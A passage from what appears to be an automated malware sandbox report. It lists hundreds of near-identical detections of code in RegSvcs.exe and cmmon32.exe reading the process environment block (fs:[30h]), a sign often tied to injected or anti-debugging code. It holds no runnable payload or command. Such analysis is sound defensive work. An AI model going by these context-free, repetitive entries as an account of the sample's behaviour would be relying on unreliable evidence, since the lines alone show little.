            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F537F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F28794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F97794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F97794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F97794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F2EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F14F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F14F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F3F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FE070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F4A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E214FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E38CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D658EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D69080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D80050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D80050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E22073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E31074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E34015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E34015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E18DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DF41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D92990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E305AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D92581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D62D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D91DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D935A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D961A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D961A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D87D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D69100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D69100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D69100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E38D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D94D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DEA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D84120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D92ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D936CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E1FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E38ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D776E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D916E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D92AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E30EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E30EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E30EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DFFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D652A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E1B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E1B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E38A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DF4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D69240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D77E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D7766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D83A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D9A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D65210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D65210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D65210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D65210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D98E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D78A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E1FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04E21608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D6E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DE53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04DA37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D8DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D903E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04D903E2 mov eax, dword ptr fs:[00000030h]
